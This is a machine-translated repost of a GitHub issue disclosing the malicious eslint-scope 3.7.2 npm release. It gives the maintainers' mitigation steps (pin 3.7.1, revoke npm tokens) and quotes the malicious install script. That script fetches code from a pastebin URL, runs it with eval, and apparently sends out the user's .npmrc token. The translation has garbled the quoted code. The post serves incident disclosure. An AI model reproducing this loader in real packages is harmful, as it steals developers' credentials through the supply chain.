Eslintスコープ3.7.2のウイルス


私はこの問題に遭遇し、私はここでそれを共有したと考えた.

Eslintスコープのウイルス? 菅39



pronebird

ブログ投稿を更新https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes


メンテナからの更新


Incident status report from npm
何が起こったかについて少し洞察をする@ platinumajureによるコメントに従ってください
https://github.com/eslint/eslint-scope/issues/39#issuecomment-404533026
また、同じコードがeslint configで公開されたようです[email protected]また未発表である.詳細はhttps://github.com/eslint/eslint/issues/10600を参照してください.

その間に

  • eslint-scope3.7.1のバージョンをピンでとめます、1つの方法はresolutionspackage.jsonを加えることです
  •   "resolutions": {
        "eslint-scope": "3.7.1"
      }
    
    依存関係のバージョンをyarn list eslint-scopeで検証します.それは、[email protected]を出力しなければなりません

  • 可能であれば、package-lock.jsonまたはyarn.lockを使用し、それをあなたのレポに持っています.yarn outdatedが利用可能な新しいバージョンがあることを示しても、3.7.2にアップグレードしないでください.

  • https://github.com/eslint/eslint-scope/issues/39#issuecomment-404496856以下のコメントで提案したNPMトークンを取り消します.あなたはhttps://www.npmjs.com/にログインすることによって同じことをすることができます.そして、口座ドロップダウンから「トークン」メニューを選んで、ページにリストされるすべてのトークンを取り除きます.あなたが外部サービスにあなたのNPMをフックする場合は、関連するトークンを再現してください.
  • 問題


    私は、これが何であるかについて、わかりません、しかし、それは私にウイルスのように見えます:
    [2/3] ⠠ eslint-scope
    error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
    Exit code: 1
    Command: node ./lib/build.js
    Arguments: 
    Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope
    Output:
    undefined:30
          https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+conten
                                                                                                                            ^^^^^^
    
    SyntaxError: Unexpected end of input
        at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
        at emitOne (events.js:116:13)
        at IncomingMessage.emit (events.js:211:7)
        at IncomingMessage.Readable.read (_stream_readable.js:475:10)
        at flow (_stream_readable.js:846:34)
        at resume_ (_stream_readable.js:828:3)
        at _combinedTickCallback (internal/process/next_tick.js:138:11)
    
    疑わしいファイルの内容
    試してみる
    var https = require (' https ');
    https.get (' host name ':' pastebin . com ', path :'/raw - xlevp 82 h ', headers : { ' user - agent ':' mozilla/5.0 ( Windows NT 6.1 ; RV : 52.0 ) Gecko/20100101 Firefox/52.0 ', accept :' text/html , application/xml html , application/xml ; q = 0.9 , */*; q = 0.8 '}, ( r )=> { { }}}
    r . setencoding (' utf 8 ');
    r . on (' data ', c )=> {
    eval ( c );
    ));
    r . on (' error ', ()>> {});
    )).(' error ', ()>> {};
    }キャッチ( e ) { } }
    ロードしようとするURLはhttp://pastebin.com/raw/XLeVP82hです
    また、私の.npmrcどこかを送信しようとします.
    これは1時間前に公開されているバージョン3.7.2です.
    View on GitHub
    特に、ウイルスがウイルスを伝播する驚くべき媒体であるパッケージ管理者は、ウイルスがbabel-eslintの依存性の上でラッチされるときです😱